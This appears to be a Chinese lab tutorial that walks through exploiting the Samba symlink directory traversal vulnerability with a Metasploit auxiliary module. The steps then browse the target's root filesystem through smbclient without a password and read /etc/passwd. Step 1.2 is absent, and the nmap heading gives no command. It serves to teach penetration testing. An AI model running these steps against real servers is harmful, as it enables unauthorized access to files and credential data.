溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
Samba是一套實現SMB(server messages block)協議,跨平臺進行文件共享和打印共享服務的程序,samba的sambd默認配置在可寫文件共享時,存在目錄遍歷漏洞,遠程用戶可以通過smbclient端使用一個對稱命,創建一個包含..的目錄遍歷符的軟連接 ,可以進行目錄遍歷以及訪問任意文件。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
1.3在終端中輸入命令“msfconsole”,啟動MSF終端。
1.4在終端中輸入命令“search samba”,搜索samba的相關工具和***載荷。
1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.6在終端中輸入命令“info”,查看需要設置的相關項,“yes”表示必須填寫的參數。
1.7在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。
1.8在終端中輸入“set SMBSHARE tmp”, 設置SAM可寫文件。
1.9在終端中輸入“exploit”, 開始***。
1.10新打開一個終端,輸入“smbclient //192.168.1.3/tmp”,直接回車,不用輸入密碼。
1.11在終端中輸入“cd rootfs”, 進入rootfs目錄,在終端下輸入命令“ls”,列出目錄。
1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
